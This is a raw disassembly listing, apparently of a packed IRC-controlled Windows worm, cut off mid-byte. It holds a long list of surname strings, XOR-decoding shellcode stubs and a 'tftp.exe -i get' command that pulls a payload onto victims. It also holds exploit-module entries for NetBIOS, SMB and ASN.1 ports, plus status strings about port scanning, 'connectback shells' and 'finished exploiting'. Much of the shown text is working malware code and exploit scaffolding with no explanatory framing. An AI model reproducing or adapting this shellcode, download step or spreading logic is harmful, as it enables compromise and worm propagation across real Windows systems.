UPX0:0042E030o align 4 aChien db 'Chien',0 ; DATA XREF: UPX0:0042E02Co align 4 aChiassino db 'Chiassino',0 ; DATA XREF: UPX0:0042E028o align 4 aChervinsky db 'Chervinsky',0 ; DATA XREF: UPX0:0042E024o align 4 aCherry db 'Cherry',0 ; DATA XREF: UPX0:0042E020o align 4 aCheang db 'Cheang',0 ; DATA XREF: UPX0:0042E01Co align 4 aCharles db 'Charles',0 ; DATA XREF: UPX0:0042E018o aChapman db 'Chapman',0 ; DATA XREF: UPX0:0042E014o aCerioli db 'Cerioli',0 ; DATA XREF: UPX0:0042E010o aCeniceros db 'Ceniceros',0 ; DATA XREF: UPX0:0042E00Co align 4 aCavell db 'Cavell',0 ; DATA XREF: UPX0:0042E008o align 10h aCavanagh db 'Cavanagh',0 ; DATA XREF: UPX0:0042E004o align 4 aCastelda db 'Castelda',0 ; DATA XREF: UPX0:0042E000o align 4 aCaspar db 'Caspar',0 ; DATA XREF: UPX0:0042DFFCo align 10h aCase db 'Case',0 ; DATA XREF: UPX0:0042DFF8o align 4 aCascio db 'Cascio',0 ; DATA XREF: UPX0:0042DFF4o align 10h aCartmill db 'Cartmill',0 ; DATA XREF: UPX0:0042DFF0o align 4 aCarper db 'Carper',0 ; DATA XREF: UPX0:0042DFECo align 4 aCaroti db 'Caroti',0 ; DATA XREF: UPX0:0042DFE8o align 4 aCarmichael db 'Carmichael',0 ; DATA XREF: UPX0:0042DFE4o align 4 aCarlyle db 'Carlyle',0 ; DATA XREF: UPX0:0042DFE0o aCarlos db 'Carlos',0 ; DATA XREF: UPX0:0042DFDCo align 4 aCarlin db 'Carlin',0 ; DATA XREF: UPX0:0042DFD8o align 10h aCarayannopoulo db 'Carayannopoulos',0 ; DATA XREF: UPX0:0042DFD4o aCaratozzolo db 'Caratozzolo',0 ; DATA XREF: UPX0:0042DFD0o aCapursi db 'Capursi',0 ; DATA XREF: UPX0:0042DFCCo aCappuccio db 'Cappuccio',0 ; DATA XREF: UPX0:0042DFC8o align 10h aCapodilupo db 'Capodilupo',0 ; DATA XREF: UPX0:0042DFC4o align 4 aCapocaccia db 'Capocaccia',0 ; DATA XREF: UPX0:0042DFC0o align 4 aCaperton db 'Caperton',0 ; DATA XREF: UPX0:0042DFBCo align 4 aCapanni db 'Capanni',0 ; DATA XREF: UPX0:0042DFB8o aCanley db 'Canley',0 ; DATA XREF: UPX0:0042DFB4o align 4 aCammilleri db 'Cammilleri',0 ; DATA XREF: UPX0:0042DFB0o align 10h aCammelli db 'Cammelli',0 ; DATA XREF: UPX0:0042DFACo align 4 aCalnan db 'Calnan',0 ; DATA XREF: UPX0:0042DFA8o align 4 aCage db 'Cage',0 ; DATA XREF: UPX0:0042DFA4o align 4 aByrd db 'Byrd',0 ; DATA XREF: UPX0:0042DFA0o align 4 aByerly db 'Byerly',0 ; DATA XREF: UPX0:0042DF9Co align 4 aByatt db 'Byatt',0 ; DATA XREF: UPX0:0042DF98o align 4 aBusetta db 'Busetta',0 ; DATA XREF: UPX0:0042DF94o aBurridge db 'Burridge',0 ; DATA XREF: UPX0:0042DF90o align 4 aBurke db 'Burke',0 ; DATA XREF: UPX0:0042DF8Co align 10h aBurdzy db 'Burdzy',0 ; DATA XREF: UPX0:0042DF88o align 4 aBurden db 'Burden',0 ; DATA XREF: UPX0:0042DF84o align 10h aBunton db 'Bunton',0 ; DATA XREF: UPX0:0042DF80o align 4 aBullard db 'Bullard',0 ; DATA XREF: UPX0:0042DF7Co aBudding db 'Budding',0 ; DATA XREF: UPX0:0042DF78o aBuchan db 'Buchan',0 ; DATA XREF: UPX0:0042DF74o align 10h aBrzycki db 'Brzycki',0 ; DATA XREF: UPX0:0042DF70o aBrook db 'Brook',0 ; DATA XREF: UPX0:0042DF6Co align 10h aBroca db 'Broca',0 ; DATA XREF: UPX0:0042DF68o align 4 aBritz db 'Britz',0 ; DATA XREF: UPX0:0042DF64o align 10h aBrinton db 'Brinton',0 ; DATA XREF: UPX0:0042DF60o aBridges db 'Bridges',0 ; DATA XREF: UPX0:0042DF5Co aBridgeman db 'Bridgeman',0 ; DATA XREF: UPX0:0042DF58o align 4 aBrewer db 'Brewer',0 ; DATA XREF: UPX0:0042DF50o ; UPX0:0042DF54o align 4 aBrennan db 'Brennan',0 ; DATA XREF: UPX0:0042DF4Co aBrenan db 'Brenan',0 ; DATA XREF: UPX0:0042DF48o align 4 aBreed db 'Breed',0 ; DATA XREF: UPX0:0042DF44o align 4 aBrecht db 'Brecht',0 ; DATA XREF: UPX0:0042DF40o align 4 aBradach db 'Bradach',0 ; DATA XREF: UPX0:0042DF3Co aBradac db 'Bradac',0 ; DATA XREF: UPX0:0042DF38o align 4 aBracalente db 'Bracalente',0 ; DATA XREF: UPX0:0042DF34o align 10h aBoyne db 'Boyne',0 ; DATA XREF: UPX0:0042DF30o align 4 aBoym db 'Boym',0 ; DATA XREF: UPX0:0042DF2Co align 10h aBoyland db 'Boyland',0 ; DATA XREF: UPX0:0042DF28o aBoyes db 'Boyes',0 ; DATA XREF: UPX0:0042DF24o align 10h aBoyajian db 'Boyajian',0 ; DATA XREF: UPX0:0042DF20o align 4 aBoxer db 'Boxer',0 ; DATA XREF: UPX0:0042DF1Co align 4 aBowers db 'Bowers',0 ; DATA XREF: UPX0:0042DF18o align 4 aBourneuf db 'Bourneuf',0 ; DATA XREF: UPX0:0042DF14o align 4 aBoudrot db 'Boudrot',0 ; DATA XREF: UPX0:0042DF10o aBoudin db 'Boudin',0 ; DATA XREF: UPX0:0042DF0Co align 4 aBotosh db 'Botosh',0 ; DATA XREF: UPX0:0042DF08o align 10h aBothman db 'Bothman',0 ; DATA XREF: UPX0:0042DF04o aBossi db 'Bossi',0 ; DATA XREF: UPX0:0042DF00o align 10h aBorden db 'Borden',0 ; DATA XREF: UPX0:0042DEFCo align 4 aBorack db 'Borack',0 ; DATA XREF: UPX0:0042DEF8o align 10h aBoorstin db 'Boorstin',0 ; DATA XREF: UPX0:0042DEF4o align 4 aBoone db 'Boone',0 ; DATA XREF: UPX0:0042DEF0o align 4 aBookbinder db 'Bookbinder',0 ; DATA XREF: UPX0:0042DEECo align 10h aBook db 'Book',0 ; DATA XREF: UPX0:0042DEE8o align 4 aBontempo db 'Bontempo',0 ; DATA XREF: UPX0:0042DEE4o align 4 aBoniface db 'Boniface',0 ; DATA XREF: UPX0:0042DEE0o align 10h aBonham db 'Bonham',0 ; DATA XREF: UPX0:0042DEDCo align 4 aBoner db 'Boner',0 ; DATA XREF: UPX0:0042DED8o align 10h aBologna db 'Bologna',0 ; DATA XREF: UPX0:0042DED4o aBollinger db 'Bollinger',0 ; DATA XREF: UPX0:0042DED0o align 4 aBolick db 'Bolick',0 ; DATA XREF: UPX0:0042DECCo align 4 aBolger db 'Bolger',0 ; DATA XREF: UPX0:0042DEC8o align 4 aBlyth db 'Blyth',0 ; DATA XREF: UPX0:0042DEC4o align 4 aBloxham db 'Bloxham',0 ; DATA XREF: UPX0:0042DEC0o aBloemhof db 'Bloemhof',0 ; DATA XREF: UPX0:0042DEBCo align 10h aBloembergen db 'Bloembergen',0 ; DATA XREF: UPX0:0042DEB8o aBloch db 'Bloch',0 ; DATA XREF: UPX0:0042DEB4o align 4 aBlizard db 'Blizard',0 ; DATA XREF: UPX0:0042DEB0o aBliss db 'Bliss',0 ; DATA XREF: UPX0:0042DEACo align 4 aBlanke db 'Blanke',0 ; DATA XREF: UPX0:0042DEA8o align 4 aBlakemore db 'Blakemore',0 ; DATA XREF: UPX0:0042DEA4o align 4 aBlagg db 'Blagg',0 ; DATA XREF: UPX0:0042DEA0o align 10h aBlackwell db 'Blackwell',0 ; DATA XREF: UPX0:0042DE9Co align 4 aBlackbourn db 'Blackbourn',0 ; DATA XREF: UPX0:0042DE98o align 4 aBisho db 'Bisho',0 ; DATA XREF: UPX0:0042DE94o align 10h aBisema db 'Bisema',0 ; DATA XREF: UPX0:0042DE90o align 4 aBir db 'Bir',0 ; DATA XREF: UPX0:0042DE8Co aBinion db 'Binion',0 ; DATA XREF: UPX0:0042DE88o align 4 aBickel db 'Bickel',0 ; DATA XREF: UPX0:0042DE84o align 4 aBiagioli db 'Biagioli',0 ; DATA XREF: UPX0:0042DE80o align 4 aBeynart db 'Beynart',0 ; DATA XREF: UPX0:0042DE7Co aBetti db 'Betti',0 ; DATA XREF: UPX0:0042DE78o align 4 aBerrizbeitia db 'Berrizbeitia',0 ; DATA XREF: UPX0:0042DE74o align 4 aBernston db 'Bernston',0 ; DATA XREF: UPX0:0042DE70o align 4 aBernassola db 'Bernassola',0 ; DATA XREF: UPX0:0042DE6Co align 10h aBernardo db 'Bernardo',0 ; DATA XREF: UPX0:0042DE68o align 4 aBerkeJenkins db 'Berke-Jenkins',0 ; DATA XREF: UPX0:0042DE64o align 4 aBergson db 'Bergson',0 ; DATA XREF: UPX0:0042DE60o aBenedictDye db 'Benedict-Dye',0 ; DATA XREF: UPX0:0042DE5Co align 4 aBelloc db 'Belloc',0 ; DATA XREF: UPX0:0042DE58o align 4 aBellini db 'Bellini',0 ; DATA XREF: UPX0:0042DE54o aBellhouse db 'Bellhouse',0 ; DATA XREF: UPX0:0042DE50o align 10h aBellavance db 'Bellavance',0 ; DATA XREF: UPX0:0042DE4Co align 4 aBelinCollart db 'Belin-Collart',0 ; DATA XREF: UPX0:0042DE48o align 4 aBelfer db 'Belfer',0 ; DATA XREF: UPX0:0042DE44o align 4 aBelaoussof db 'Belaoussof',0 ; DATA XREF: UPX0:0042DE40o align 10h aBelanger db 'Belanger',0 ; DATA XREF: UPX0:0042DE3Co align 4 aBehenna db 'Behenna',0 ; DATA XREF: UPX0:0042DE38o aBedford db 'Bedford',0 ; DATA XREF: UPX0:0042DE34o aBeder db 'Beder',0 ; DATA XREF: UPX0:0042DE30o align 4 aBeckman db 'Beckman',0 ; DATA XREF: UPX0:0042DE2Co aBean db 'Bean',0 ; DATA XREF: UPX0:0042DE28o align 4 aBeal db 'Beal',0 ; DATA XREF: UPX0:0042DE24o align 4 aBeacon db 'Beacon',0 ; DATA XREF: UPX0:0042DE20o align 4 aBayo db 'Bayo',0 ; DATA XREF: UPX0:0042DE1Co align 4 aBayles db 'Bayles',0 ; DATA XREF: UPX0:0042DE18o align 4 aBaumiller db 'Baumiller',0 ; DATA XREF: UPX0:0042DE14o align 10h aBatchelder db 'Batchelder',0 ; DATA XREF: UPX0:0042DE10o align 4 aBashevis db 'Bashevis',0 ; DATA XREF: UPX0:0042DE0Co align 4 aBasavappa db 'Basavappa',0 ; DATA XREF: UPX0:0042DE08o align 4 aBartoo db 'Bartoo',0 ; DATA XREF: UPX0:0042DE04o align 4 aBartolome db 'Bartolome',0 ; DATA XREF: UPX0:0042DE00o align 4 aBartholomew db 'Bartholomew',0 ; DATA XREF: UPX0:0042DDFCo aBarry db 'Barry',0 ; DATA XREF: UPX0:0042DDF8o align 4 aBarriola db 'Barriola',0 ; DATA XREF: UPX0:0042DDF4o align 4 aBarnett db 'Barnett',0 ; DATA XREF: UPX0:0042DDF0o aBarneson db 'Barneson',0 ; DATA XREF: UPX0:0042DDECo align 4 aBarbetti db 'Barbetti',0 ; DATA XREF: UPX0:0042DDE8o align 4 aBarberi db 'Barberi',0 ; DATA XREF: UPX0:0042DDE4o aBaranowska db 'Baranowska',0 ; DATA XREF: UPX0:0042DDE0o align 4 aBaranczak db 'Baranczak',0 ; DATA XREF: UPX0:0042DDDCo align 4 aBarajas db 'Barajas',0 ; DATA XREF: UPX0:0042DDD8o aBarabesi db 'Barabesi',0 ; DATA XREF: UPX0:0042DDD4o align 4 aBanta db 'Banta',0 ; DATA XREF: UPX0:0042DDD0o align 4 aBaltz db 'Baltz',0 ; DATA XREF: UPX0:0042DDCCo align 4 aBallew db 'Ballew',0 ; DATA XREF: UPX0:0042DDC8o align 4 aBallatori db 'Ballatori',0 ; DATA XREF: UPX0:0042DDC4o align 10h aBaleja db 'Baleja',0 ; DATA XREF: UPX0:0042DDC0o align 4 aBakanowsky db 'Bakanowsky',0 ; DATA XREF: UPX0:0042DDBCo align 4 aBailar db 'Bailar',0 ; DATA XREF: UPX0:0042DDB8o align 4 aBagnold db 'Bagnold',0 ; DATA XREF: UPX0:0042DDB4o aBaglivo db 'Baglivo',0 ; DATA XREF: UPX0:0042DDB0o aBady db 'Bady',0 ; DATA XREF: UPX0:0042DDACo align 4 aBackus db 'Backus',0 ; DATA XREF: UPX0:0042DDA8o align 4 aBachmuth db 'Bachmuth',0 ; DATA XREF: UPX0:0042DDA4o align 4 aAzima db 'Azima',0 ; DATA XREF: UPX0:0042DDA0o align 10h aAyling db 'Ayling',0 ; DATA XREF: UPX0:0042DD9Co align 4 aAykroyd db 'Aykroyd',0 ; DATA XREF: UPX0:0042DD98o aAyiemba db 'Ayiemba',0 ; DATA XREF: UPX0:0042DD94o aAxworthy db 'Axworthy',0 ; DATA XREF: UPX0:0042DD90o align 4 aAxelrod db 'Axelrod',0 ; DATA XREF: UPX0:0042DD8Co aAurelius db 'Aurelius',0 ; DATA XREF: UPX0:0042DD88o align 4 aAugustus db 'Augustus',0 ; DATA XREF: UPX0:0042DD84o align 4 aAtkins db 'Atkins',0 ; DATA XREF: UPX0:0042DD80o align 4 aArky db 'Arky',0 ; DATA XREF: UPX0:0042DD7Co align 4 aArjas db 'Arjas',0 ; DATA XREF: UPX0:0042DD78o align 4 aAristotle db 'Aristotle',0 ; DATA XREF: UPX0:0042DD74o align 4 aArellano db 'Arellano',0 ; DATA XREF: UPX0:0042DD70o align 4 aArduini db 'Arduini',0 ; DATA XREF: UPX0:0042DD6Co aArbia db 'Arbia',0 ; DATA XREF: UPX0:0042DD68o align 4 aAntos db 'Antos',0 ; DATA XREF: UPX0:0042DD64o align 4 aAnthony db 'Anthony',0 ; DATA XREF: UPX0:0042DD60o aAnsley db 'Ansley',0 ; DATA XREF: UPX0:0042DD5Co align 4 aAnfinrud db 'Anfinrud',0 ; DATA XREF: UPX0:0042DD58o align 4 aAndron db 'Andron',0 ; DATA XREF: UPX0:0042DD54o align 10h aAndrelus db 'Andrelus',0 ; DATA XREF: UPX0:0042DD50o align 4 aAndo db 'Ando',0 ; DATA XREF: UPX0:0042DD4Co align 4 aAndel db 'Andel',0 ; DATA XREF: UPX0:0042DD48o align 4 aAnand db 'Anand',0 ; DATA XREF: UPX0:0042DD44o align 4 aAmsden db 'Amsden',0 ; DATA XREF: UPX0:0042DD40o align 4 aAmeer db 'Ameer',0 ; DATA XREF: UPX0:0042DD3Co align 4 aAmatangelo db 'Amatangelo',0 ; DATA XREF: UPX0:0042DD38o align 10h aAmaral db 'Amaral',0 ; DATA XREF: UPX0:0042DD34o align 4 aAltenhofen db 'Altenhofen',0 ; DATA XREF: UPX0:0042DD30o align 4 aAltenberger db 'Altenberger',0 ; DATA XREF: UPX0:0042DD2Co aAltavilla db 'Altavilla',0 ; DATA XREF: UPX0:0042DD28o align 4 aAlongi db 'Alongi',0 ; DATA XREF: UPX0:0042DD24o align 4 aAllison db 'Allison',0 ; DATA XREF: UPX0:0042DD20o aAleks db 'Aleks',0 ; DATA XREF: UPX0:0042DD1Co align 4 aAlda db 'Alda',0 ; DATA XREF: UPX0:0042DD18o align 4 aAlcorn db 'Alcorn',0 ; DATA XREF: UPX0:0042DD14o align 4 aAlavi db 'Alavi',0 ; DATA XREF: UPX0:0042DD10o align 4 aAhlers db 'Ahlers',0 ; DATA XREF: UPX0:0042DD0Co align 4 aAdorno db 'Adorno',0 ; DATA XREF: UPX0:0042DD08o align 4 aAdibe db 'Adibe',0 ; DATA XREF: UPX0:0042DD04o align 4 aAdelstein db 'Adelstein',0 ; DATA XREF: UPX0:0042DD00o align 10h aAddison db 'Addison',0 ; DATA XREF: UPX0:off_42DCFCo aAdams db 'Adams',0 ; DATA XREF: UPX0:0042DCF8o align 10h aAckerman db 'Ackerman',0 ; DATA XREF: UPX0:0042DCF4o align 4 aAbdulrazak db 'Abdulrazak',0 ; DATA XREF: UPX0:off_42DCF0o align 4 byte_431948 db 50h ; DATA XREF: UPX0:0040ADF0o ; UPX0:0040ADFDr db 43h, 2 dup(0) dword_43194C dd 7C7325h ; DATA XREF: UPX0:0040AE9Bo dword_431950 dd 5D73255Bh, 7Ch ; DATA XREF: UPX0:0040AFA5o dword_431958 dd 3F3F3Fh ; DATA XREF: UPX0:loc_40AF9Co ; sub_41AA43:loc_41AB06o dword_43195C dd 334B32h ; DATA XREF: UPX0:0040AF95o dword_431960 dd 5058h ; DATA XREF: UPX0:0040AF87o ; sub_41AA43+AAo dword_431964 dd 4B32h ; DATA XREF: UPX0:0040AF77o ; sub_41AA43+98o dword_431968 dd 454Dh ; DATA XREF: UPX0:0040AF5Eo ; sub_41AA43+7Eo dword_43196C dd 3839h ; DATA XREF: UPX0:0040AF4Eo ; sub_41AA43+6Co dword_431970 dd 544Eh ; DATA XREF: UPX0:0040AF3Eo ; sub_41AA43+5Ao dword_431974 dd 3539h ; DATA XREF: UPX0:0040AF30o ; sub_41AA43+46o dword_431978 dd 5D64255Bh, 7325h ; DATA XREF: sub_40AFEB+3Ao dword_431980 dd 5D4D5Bh ; DATA XREF: sub_40AFEB+2Co ; sub_40AFEB+57o aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40AFEB+18o ; sub_418212+5o align 4 jmp short loc_431990 ; --------------------------------------------------------------------------- loc_43198E: ; CODE XREF: UPX0:loc_431990p jmp short loc_431995 ; --------------------------------------------------------------------------- loc_431990: ; CODE XREF: UPX0:0043198Cj call loc_43198E loc_431995: ; CODE XREF: UPX0:loc_43198Ej pop ebx xor ecx, ecx mov cx, 0FFFFh loc_43199C: ; CODE XREF: UPX0:004319A1j xor byte ptr [ebx+0Eh], 0FFh inc ebx loop loc_43199C add bl, ch add ch, bl add eax, 0FFFFF9E8h call fword ptr [ebx+31h] leave mov cl, 0FFh loc_4319B2: ; CODE XREF: UPX0:004319B7j xor byte ptr [ebx+0Ch], 0FFh inc ebx loop loc_4319B2 ; --------------------------------------------------------------------------- db 3 dup(0) dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h dd 12h aTftp_exeIGet db 'tftp.exe -i get ',0 ; --------------------------------------------------------------------------- push 0 call sub_431A54 jnz short loc_431A40 retn ; --------------------------------------------------------------------------- loc_431A40: ; CODE XREF: UPX0:00431A3Dj ; UPX0:00431A4Dj call near ptr loc_431A45+1 loc_431A45: ; CODE XREF: UPX0:loc_431A40p add [edx+0], ch call sub_431A54 jz loc_431A40 retn ; =============== S U B R O U T I N E ======================================= sub_431A54 proc near ; CODE XREF: UPX0:00431A38p ; UPX0:00431A48p pop eax pop ebx pop ebp push eax sub esp, 54h xor eax, eax mov edi, esp lea ecx, [eax+40h] mov edx, edi rep stosb mov al, 44h stosd push edi push edx push ecx push ecx push 28h push 1 push ecx push ecx push ebp push ebx call esi add esp, 54h test eax, eax retn sub_431A54 endp ; --------------------------------------------------------------------------- align 10h dword_431A80 dd 234032Dh, 65726874h, 6C206461h, 2747369h, 202D03h ; DATA XREF: sub_40B1B4+10o aSNoSThreadFoun db '%s No %s thread found.',0 ; DATA XREF: sub_40B385+51o align 4 aSSStopped_DThr db '%s %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_40B385+35o align 8 aSym db 'sym',0 ; DATA XREF: sub_40C125+169o dd 0 db 2 dup(0) aSymantec db 'Symantec',0 ; DATA XREF: sub_40B7DB+30o align 4 dd 5 dup(0) dword_431B00 dd 0B97h ; DATA XREF: sub_401ACD+1DA1r ; sub_401ACD+1DCAo ... off_431B04 dd offset sub_40E0D1 ; DATA XREF: sub_40C125+1EAr dword_431B08 dd 0 ; DATA XREF: sub_40B64B+2Eo ; UPX0:0040D496w ... dword_431B0C dd 1 ; DATA XREF: sub_40BACE+1Fr dword_431B10 dd 1 ; DATA XREF: sub_40BACE+3B3r dword_431B14 dd 0 ; DATA XREF: sub_40BACE+292r dd 636E76h, 0 dd 6E760000h, 63h, 6 dup(0) dd 170Ch, 40E207h, 0 dd 2 dup(1), 0 aNet139 db 'net139',0 align 10h dd 654E0000h, 69706174h, 393331h, 5 dup(0) dd 8Bh, 40DF8Fh, 0 dd 2 dup(1), 0 aNet445 db 'net445',0 align 10h dd 654E0000h, 69706174h, 353434h, 5 dup(0) dd 1BDh, 40DF8Fh, 0 dd 2 dup(1), 0 aAsn80 db 'asn80',0 align 10h dd 53410000h, 2D312E4Eh, 50545448h, 5 dup(0) dd 50h, 40D2DAh, 0 dd 2 dup(1), 0 aAsn445 db 'asn445',0 align 10h dd 53410000h, 2D312E4Eh, 424D53h, 5 dup(0) dd 1BDh, 40D2DAh, 0 dd 2 dup(1), 0 aAsn139 db 'asn139',0 align 10h dd 53410000h, 2D312E4Eh, 20424D53h, 544Eh, 4 dup(0) dd 8Bh, 40D2DAh, 0 dd 2 dup(1), 2 dup(0) dd 10100h, 0Eh dup(0) aAsn445_0 db 'asn445',0 align 10h db 2 dup(0) byte_431CE2 db 1 ; DATA XREF: sub_401ACD:loc_4037E7r ; sub_401ACD+1D24o db 73h dd 6D79h, 0 dd 100h, 3 dup(0) ; --------------------------------------------------------------------------- jmp short loc_431D0E ; =============== S U B R O U T I N E ======================================= sub_431CFE proc near ; CODE XREF: sub_431CFE:loc_431D0Ep pop edx dec edx xor ecx, ecx mov cx, 166h loc_431D06: ; CODE XREF: sub_431CFE+Cj xor byte ptr [edx+ecx], 99h loop loc_431D06 jmp short loc_431D13 ; --------------------------------------------------------------------------- loc_431D0E: ; CODE XREF: UPX0:00431CFCj call sub_431CFE loc_431D13: ; CODE XREF: sub_431CFE+Ej jo short near ptr dword_431C9C+12h cwde cdq cdq retn sub_431CFE endp ; sp-analysis failed ; --------------------------------------------------------------------------- db 21h, 95h, 69h dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h dd 0FAF899F7h, 0EDE9FCFAh, 99h aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_40B64B+86o align 10h dword_431E90 dd 25370320h, 203A0373h, 2C6425h ; DATA XREF: sub_40B64B+46o unk_431E9C db 2Dh ; - ; DATA XREF: sub_40B64B+11o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aExploitStatist db 'Exploit Statistics:',0 unk_431EBC db 2Dh ; - ; DATA XREF: sub_40B71A+38o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h db 54h ; T db 72h, 61h, 6Eh db 73h ; s db 66h, 65h, 72h db 20h db 53h, 74h, 61h db 74h ; t db 69h, 73h, 74h db 69h ; i db 63h, 73h, 3Ah db 20h db 2, 54h, 46h db 54h ; T db 50h, 2, 3Ah db 20h db 25h, 64h, 2Ch db 20h db 2, 46h, 54h db 50h ; P db 2, 3Ah, 20h aDTotalDInS_ db '%d, Total %d in %s.',0 unk_431F04 db 2Dh ; - ; DATA XREF: sub_40B786+22o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aDConnectbackSh db '%d connectback shells in %s.',0 align 10h aScanTimeS_ db ' Scan Time: %s.',0 ; DATA XREF: sub_40B7DB+7Fo dword_431F40 dd 25370320h, 28200373h, 73253403h, 2C2903h ; DATA XREF: sub_40B7DB+40o dword_431F50 dd 234032Dh, 6E616373h, 202D0302h, 6C707845h, 2074696Fh ; DATA XREF: sub_40B7DB+14o dd 7473694Ch, 3Ah unk_431F6C db 2Dh ; - ; DATA XREF: sub_40B8A2+172o db 3, 34h, 2 db 65h ; e db 78h, 70h, 6Ch db 6Fh ; o db 69h, 74h, 2 db 3 aFinishedExploi db '- finished exploiting %s (%d attempts)',0 unk_431FA0 db 2Dh ; - ; DATA XREF: sub_40B8A2+80o db 3, 34h, 2 db 65h ; e db 78h, 70h, 6Ch db 6Fh ; o db 69h, 74h, 2 db 3 db 2Dh, 20h, 74h db 72h ; r db 79h, 69h, 6Eh db 67h ; g db 20h, 2, 25h db 73h ; s db 2, 20h, 6Fh aNSPortD___ db 'n %s (port %d)...',0 align 10h unk_431FD0 db 2Dh ; - ; DATA XREF: sub_40BA57+42o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aScanNotActive_ db 'Scan not active.',0 align 10h unk_431FF0 db 2Dh ; - ; DATA XREF: sub_40BA57+2Co db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aCurrentIpS_ db 'Current IP: %s.',0 unk_43200C db 2Dh ; - ; DATA XREF: sub_40BACE+4B7o db 3, 34h, 2 db 68h ; h db 2 dup(74h), 70h db 64h ; d db 2, 3, 2Dh aFailedToSta_33 db ' Failed to start server, error: <%d>.',0 align 10h unk_432040 db 2Dh ; - ; DATA XREF: sub_40BACE+38Fo db 3, 34h, 2 db 63h ; c db 6Fh, 2 dup(6Eh) db 65h ; e db 63h, 74h, 62h db 61h ; a db 63h, 6Bh, 2 db 3 aFailedToSta_34 db '- Failed to start server, error: <%d>.',0 unk_432078 db 2Dh ; - ; DATA XREF: sub_40BACE+321o db 3, 34h, 2 db 63h ; c db 6Fh, 2 dup(6Eh) db 65h ; e db 63h, 74h, 62h db 61h ; a db 63h, 6Bh, 2 db 3 aServerStarte_2 db '- Server started on Port: %d.',0 align 4 unk_4320A8 db 2Dh ; - ; DATA XREF: sub_40BACE+26Co db 3, 34h, 2 db 66h ; f db 74h, 70h, 64h db 2 db 3, 2Dh, 20h aFailedToSta_35 db 'Failed to start server, error: <%d>.',0 align 4 unk_4320DC db 2Dh ; - ; DATA XREF: sub_40BACE+1FEo db 3, 34h, 2 db 66h ; f db 74h, 70h, 64h db 2 db 3, 2Dh, 20h aServerStarte_3 db 'Server started on Port: %d, File: %s.',0 align 10h unk_432110 db 2Dh ; - ; DATA XREF: sub_40BACE+148o db 3, 34h, 2 db 74h ; t db 66h, 74h, 70h db 64h ; d db 2, 3, 2Dh aFailedToSta_36 db ' Failed to start server, error: <%d>.',0 align 4 unk_432144 db 2Dh ; - ; DATA XREF: sub_40C125+EEo db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aIpSPortDIsOpen db 'IP: %s, Port %d is open.',0 align 4 unk_43216C db 2Dh ; - ; DATA XREF: sub_40C125+93o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aIpSDScanThread db 'IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0 unk_4321A4 db 2Dh ; - ; DATA XREF: sub_40C33D+1CEo db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aFinishedAtSDAf db 'Finished at %s:%d after %d minute(s) of scanning.',0 align 4 unk_4321E4 db 2Dh ; - ; DATA XREF: sub_40C33D+173o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0 unk_43221C db 2Dh ; - ; DATA XREF: sub_40C33D+103o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aSDScanThreadDS db '%s:%d, Scan thread: %d, Sub-thread: %d.',0 unk_432250 db 2Dh ; - ; DATA XREF: sub_40C33D+87o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aFailedToInitia db 'Failed to initialize critical section.',0 align 4 unk_432284 db 2Dh ; - ; DATA XREF: sub_40C59C+92o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aIpSPortDIsOp_0 db 'IP: %s Port: %d is open.',0 align 4 unk_4322AC db 2Dh ; - ; DATA XREF: sub_40C669+41o db 3, 34h, 2 db 